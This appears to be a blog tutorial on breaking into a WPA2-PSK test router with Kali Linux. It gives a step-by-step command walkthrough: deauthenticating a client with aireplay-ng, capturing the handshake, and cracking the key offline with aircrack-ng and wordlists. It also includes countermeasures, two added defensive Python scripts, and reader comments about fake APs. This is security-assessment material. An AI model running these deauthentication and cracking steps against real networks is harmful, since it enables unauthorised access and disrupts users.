By Tony Lee
Introduction
In our previous article we used TP-Link’s TL-WN722N and a Kali Virtual Machine (VM) to perform wireless discovery and attack against a Wired Equivalent Privacy (WEP) network to showcase the abilities of this inexpensive and flexible setup. In this article we will continue to test our setup by attacking our home router running WPA Pre-Shared Key (PSK), walking you through the attack from start to finish.
Figure 1: Our setup
Consult our previous article for the following topics as they are omitted from this article due to similarity:
- Equipment
- Hardware
- Software
- Tips and tricks
- Version of Workstation
- Screen Resolution
- Simple Text Editor
- Connecting the USB Device
Outline
- Preparation
- Discovery (Kismet)
- Attack
  - Explained
  - Setting the Variables
  - Capture the Handshake
  - Deauthenticate the Client
  - Brute-force the Key
  - Connect
- Countermeasures
- Conclusion
Preparation
NetworkManager (included in the default Kali Linux) can cause problems when trying to complete simple tasks such as connecting to wireless networks. To prevent any interference, we will disable it ahead of time.
root@kali:~# service network-manager stop
[ ok ] Stopping network connection manager: NetworkManager.
Discovery (Kismet)
In the previous article, we mentioned that the simplest way to ensure that the wireless card is working is to do some light discovery. After all, the first step in a wireless engagement is to identify targets of interest. The iwlist command works great for this as you can stay in “Managed” mode as shown in the iwconfig command in the previous article.
root@kali:~# iwlist wlan0 scanning
wlan0 Scan completed :
Cell 01 - Address: 00:7F:28:xx:xx:xx
Channel:6
Frequency:2.437 GHz (Channel 6)
Quality=37/70 Signal level=-73 dBm
Encryption key:on
ESSID:"xxxxxxThexxxxx"
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s
Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master
--snip--
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : CCMP
Pairwise Ciphers (1) : CCMP
Authentication Suites (1) : PSK
IE: WPA Version 1
Group Cipher : CCMP
--snip--
For more advanced discovery and tracking, we want to place the wireless card into “Monitor” mode. We could do this manually with airmon-ng as we did in our previous article; however let’s use Kismet for our discovery this time using the following syntax:
root@kali:~# kismet -c wlan0
Figure 2: Kismet is detecting wireless networks
Did you notice that we used wlan0 in the Kismet syntax above? Doesn’t Kismet need the wireless card in monitor mode in order for it to work properly? Sure does, but it handles that in the background:
Running iwconfig shows that Kismet created a monitor mode interface called wlan0mon:
root@kali:~# iwconfig
wlan0mon IEEE 802.11bgn Mode:Monitor Frequency:2.422 GHz Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:off
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
lo no wireless extensions.
eth0 no wireless extensions.
Since Kismet is detecting networks correctly, we can use this for our target discovery… but first a little cleanup to the default Kismet user interface (UI).
- Get rid of the packet graph
- Stop the auto-sort
- List the clients
While the packet graph looks cool, it does not help us in this task, so we disable it by clicking on View -> Packet Graph.
Also, since we want to focus on one network, we don’t want it to Auto-sort. This can be disabled by clicking on Sort -> SSID.
Lastly, since a victim is necessary for the WPA-PSK attack, enable viewing of clients by clicking View -> Client List.
We will need to note the same information as in the previous article:
- Name of the wireless network (ESSID)
- MAC address of the AP (BSSID)
- Channel that the AP is sitting on
- MAC address of a wireless client
Figure 3: Kismet provides enough victim information to proceed with the attack
We can now shut down Kismet and begin the attack.
Attack
Now that discovery is complete, we should have enough information to attack the victim Access Point (AP) to further prove that this wireless card is worth having in our toolkit. But what attack are we performing and why does it work?
Explained
In the previous article, we cracked a WEP key. The process is a bit different for cracking WPA-PSK.
“Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.
The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.”
Even with the warning above to avoid dictionary-based and short pre-shared keys, we still see them quite often. Let’s take a look at the attack.
Setting the Variables
In our example, the victim information is summarized below:
Variable name = Description: Value
==============================
$ESSID = ESSID: QX3A7
$CH = Channel: 6
$AP = AP MAC: 30:46:9A:16:ED:CE
$VM = Victim user MAC: 24:77:03:8C:D3:44
Since this is a good amount of information that can be easily mistyped (one number off on a MAC address), we use shell variables when attacking wireless networks.
It is good practice to open 2-3 windows and copy the following into each window to set the variables:
export ESSID=QX3A7
export CH=6
export AP=30:46:9A:16:ED:CE
export VM=24:77:03:8C:D3:44
The layout shown in the screenshot below is our personal preference, but we find it quite useful. We will monitor/capture in the top window, perform active attacks against the AP/client in the middle window, and use the bottom window for cracking the crypto key.
Figure 4: The screenshot above shows the variables being set in a few shell windows--this is for convenience
Now that we have our windows set up and environment variables set to our victim, let’s begin the attack. If you want to change your MAC address for extra stealth, now is the time to do so.
Capture the Handshake
We begin by capturing the traffic in an attempt to capture the 4-way handshake. This is a convenient way to start because it also locks us on to the channel of the AP of interest (in this example, channel 6).
Syntax:
airodump-ng -c <CHANNEL> --bssid <APMAC> -w <FILE PREFIX> <INT>
Key:
-c = Channel that the AP is on
--bssid = MAC address of the AP
-w = Prefix of the file name that you want to write data to
<INT> = Interface we will be capturing on
Attack:
airodump-ng -c $CH --bssid $AP -w WPAcapture mon0
Deauthenticate the Client
The goal here is to deauthenticate (aka kick a client off the network) so they reconnect to the network. Upon client reauthentication, we can capture their 4-way handshake.
Syntax:
aireplay-ng -0 25 -a <AP> -c <VICTIM_MAC> <INT>
Key:
-0 = (same as --deauth) deauthentication attack
-a = MAC address of the AP
-c = Victim MAC address
<INT> = Interface we will be attacking from
Attack:
aireplay-ng -0 25 -a $AP -c $VM mon0
When you are watching your attack take place, keep an eye on the top right-hand corner of the capture window. The following message should appear when you have successfully captured the 4-way handshake: “WPA handshake: XX:XX:XX:XX:XX:XX” (where X’s are the MAC address (BSSID) of the AP you are interested in). Feel free to stop the capture process with Control+c after the handshake is captured. The screenshot below shows the attack windows and a successfully captured WPA handshake.
Figure 5: The attack is under way
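From the defender's side, the burst of deauthentication frames sent in this step is visible to any monitor-mode sensor watching the same channel. The following is an added example, not part of the original article: it flags an AP/station pair that sees many deauthentication frames in a short window. The tab-separated input format, the threshold, the function names and the MAC addresses in the sample are all assumptions constructed for illustration.

```python
from collections import defaultdict, deque

DEAUTH = 0x0C  # 802.11 management frame subtype 12 = deauthentication

def parse(line):
    """Parse 'epoch<TAB>type_subtype<TAB>src<TAB>dst<TAB>bssid' (assumed export format)."""
    ts, subtype, src, dst, bssid = line.rstrip("\n").split("\t")
    # int(x, 0) accepts both "12" and "0x000c"
    return float(ts), int(subtype, 0), src.lower(), dst.lower(), bssid.lower()

def deauth_bursts(lines, threshold=10, window=5.0):
    """Return (bssid, station, first_ts, peak_count) for every AP/station pair
    that saw at least `threshold` deauth frames within `window` seconds."""
    recent = defaultdict(deque)   # (bssid, station) -> timestamps inside the window
    alerts = {}
    for line in lines:
        if not line.strip():
            continue
        ts, subtype, src, dst, bssid = parse(line)
        if subtype != DEAUTH:
            continue
        # Spoofed deauths go in both directions; key on the non-AP end.
        station = dst if src == bssid else src
        q = recent[(bssid, station)]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            first, peak = alerts.get((bssid, station), (q[0], 0))
            alerts[(bssid, station)] = (first, max(peak, len(q)))
    return [(b, s, first, peak) for (b, s), (first, peak) in sorted(alerts.items())]

# Constructed sample: one beacon, one ordinary disconnect, then 25 deauths in 2.4 s.
AP, STA, OTHER = "02:00:00:00:00:aa", "02:00:00:00:00:01", "02:00:00:00:00:02"
SAMPLE = [f"100.0\t0x0008\t{AP}\tff:ff:ff:ff:ff:ff\t{AP}",
          f"101.0\t0x000c\t{OTHER}\t{AP}\t{AP}"]
SAMPLE += [f"{200 + i * 0.1:.1f}\t0x000c\t{AP if i % 2 else STA}\t{STA if i % 2 else AP}\t{AP}"
           for i in range(25)]

if __name__ == "__main__":
    for bssid, station, first, peak in deauth_bursts(SAMPLE):
        print(f"deauth burst: bssid={bssid} station={station} start={first} frames={peak}")
```

Input in this shape can be produced from a capture with `tshark -T fields -e frame.time_epoch -e wlan.fc.type_subtype -e wlan.sa -e wlan.da -e wlan.bssid`. A single deauthentication frame, like the ordinary disconnect in the sample, stays below the threshold and raises no alert.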
Brute-force the Key
Now it is time to run aircrack-ng against the pcap file which contains the handshake.
Since this is an off-line brute-force attack, you will need a sufficiently large wordlist to supply to aircrack-ng. The rockyou.com word list is a good start as it contains almost 14.5 million passwords. In order to use the rockyou.com wordlist, you will have to uncompress it as shown below:
root@kali:/usr/share/wordlists# ls
rockyou.txt.gz
root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz
root@kali:/usr/share/wordlists# ls
rockyou.txt
root@kali:/usr/share/wordlists# wc -l rockyou.txt
14344392 rockyou.txt
After uncompressing the wordlist, run aircrack-ng as shown below:
Syntax:
aircrack-ng -w <WORDLIST> <PCAP>
Key:
-w = wordlist
Attack:
root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt WPAcapture-01.cap
Figure 6: Brute-forcing takes time…
Eventually, if all goes well, the key will be found. Our Kali VM (virtual CPU only) is checking passwords at about 737.75 passwords/second. There are 14,344,392 passwords in the rockyou.com list. Simple math shows that the entire list can be exhausted in 14,344,392 / 738 ≈ 19,436 seconds or 19,436/60 ≈ 324 minutes or 324/60 ≈ 5.4 hours. Fortunately our password of “cheekymonkeyrox” was not at the end of the list and it cracked in 22 minutes and 55 seconds.
Figure 7: Key is finally cracked
For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger:
Generate permutations with JTR:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout
Feed JTR permutations into aircrack-ng:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | aircrack-ng -w - -e <ESSID> <PCAP>
Example:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | aircrack-ng -w - -e QX3A7 WPAcapture-01.cap
Connect
Now that we have recovered the key, we will connect to the AP using the command line steps outlined below:
Check the status of the card:
root@kali:~# iwconfig wlan0
Enter the network information:
root@kali:~# iwconfig wlan0 essid "QX3A7"
Bring the Interface up:
root@kali:~# ifconfig wlan0 up
Create wpa_supplicant file named wpa-psk.conf with your favorite text editor:
network={
ssid="QX3A7"
key_mgmt=WPA-PSK
group=CCMP
pairwise=CCMP
proto=WPA2
psk="cheekymonkeyrox"
}
Run the wpa_supplicant:
root@kali:~# wpa_supplicant -i wlan0 -c ~/wpa-psk.conf
Obtain an IP:
root@kali:~# dhclient wlan0
Reloading /etc/samba/smb.conf: smbd only.
Verify an IP is obtained:
root@kali:~# ifconfig wlan0
Figure 9: Connecting to the WPA-PSK using wpa_supplicant
Countermeasures
Even though the intention of this article is not to warn about the dangers of using WPA-PSK security, we feel that it is important to note that WPA-PSK should be used sparingly and with great caution in an enterprise environment. That said, we perform many wireless assessments in which we discover that the clients are using WPA-PSK in certain circumstances (usually required for hand scanners or some other one-off devices). For these special cases, we recommend the following (in order from most secure to least):
- Turn off the network if it is no longer needed
- Air gap the wireless network from the corporate network
- Only use REALLY long and complex passwords - change frequently if possible
- Segment the wireless network from the wired network via Firewall and IPS
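To make the "long and complex" recommendation checkable, the following added example (not part of the original article) audits a proposed PSK before deployment: it enforces the 8 to 63 character limit, looks the value up in a wordlist, and only then estimates exhaustive-search time at the guess rate measured above. The function names and the three-entry wordlist are constructed for illustration.

```python
import string

MIN_LEN, MAX_LEN = 8, 63   # WPA-PSK passphrase length limits quoted in the article
RATE = 737.75              # guesses/second measured on the article's Kali VM

def charset_size(psk):
    """Size of the smallest standard alphabet covering every character in psk."""
    classes = (string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation + " ")
    return sum(len(c) for c in classes if any(ch in c for ch in psk))

def brute_force_years(psk, rate=RATE):
    """Years to try every string of this length over the covering alphabet."""
    return charset_size(psk) ** len(psk) / rate / (365 * 24 * 3600)

def wordlist_position(psk, lines):
    """1-based position of psk in an iterable of wordlist lines, or None."""
    for n, line in enumerate(lines, 1):
        if line.rstrip("\r\n") == psk:
            return n
    return None

def audit(psk, lines, rate=RATE):
    """Return (verdict, detail) for a proposed PSK checked against one wordlist."""
    printable = all(32 <= ord(c) <= 126 for c in psk)
    if not (MIN_LEN <= len(psk) <= MAX_LEN and printable):
        return ("invalid", "must be 8-63 printable ASCII characters")
    pos = wordlist_position(psk, lines)
    if pos is not None:
        return ("reject", f"wordlist entry {pos}: reached after {pos / rate:.0f} s "
                          f"at {rate} guesses/s")
    # Absence from one wordlist is not proof of strength; this is a lower bar only.
    return ("ok", f"not in wordlist; exhaustive search ~{brute_force_years(psk, rate):.1e} years")

# Constructed three-line wordlist standing in for a real one such as rockyou.txt.
SAMPLE_WORDLIST = ["password\n", "123456\n", "cheekymonkeyrox\n"]

if __name__ == "__main__":
    for candidate in ("cheekymonkeyrox", "short", "T7#qLp2!vZx9@Rk4mWd8"):
        print(candidate, audit(candidate, SAMPLE_WORDLIST))
    print(f"cheekymonkeyrox by brute force alone: {brute_force_years('cheekymonkeyrox'):.1e} years")
```

The 15-character key from this article would take on the order of 10^10 years to brute-force character by character at this rate, yet it is rejected because it is a wordlist entry. To check against a real list, pass an open file handle as `lines`, for example `open("/usr/share/wordlists/rockyou.txt", encoding="latin-1")`.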
Conclusion
In this article, we proved the capabilities of an inexpensive wireless adapter and a flexible virtualized wireless attack image by breaking into a WPA-PSK test network. For just $16 and no reboot required you can place a wireless adapter into monitor mode and start assessing wireless networks. More testing needs to be done with this setup to determine other capabilities; however as of right now, it appears that it can provide quick, portable, flexible, and inexpensive wireless testing. Feedback below is always appreciated.
If you try this with different cards and run into issues, check the following excellent resource: http://docs.kali.org/troubleshooting/troubleshooting-wireless-driver-issues
Special Thanks
Dan Dumond
hey can you make wpa tutorial using reaver?
Hi Tony.
Great article, thanks and keep it up.
I have exactly same wn722n and using kali with vmware. But I can't get handshake? Any suggestions?
Can you confirm that your fake AP is working? Change the SSID to something unique and check to see that it is visible from another device (laptop, phone, etc.) If the fake AP is working, change the name back to the target SSID and get closer to the wireless client. Your signal will need to be stronger than the wireless AP for the victim to migrate to you. Lastly, if you can control the wireless victim you may be able to test this by disabling wireless and re-enabling it. If all of these troubleshooting steps don't work there may be some resiliency built into the wireless supplicant?
Finally, it worked. I guess the problem was leaving (airodump-ng mon0) command running. Moreover, your guess was correct regarding resiliency, some devices refuse to be deauth.
I believe that cracking wireless passwords (either wep or wpa) needs patience and luck sometimes.
Thanks Tony.
Glad to hear it worked out. Patience and luck indeed. Sometimes it is also helpful to use two cards. One to perform the attack and one card to monitor/validate what is happening. You can even use two USB cards on the same system if you prefer. Typically, I try to use different cards/vendors though. For example: Alpha and TP-Link. Anyway, happy hacking!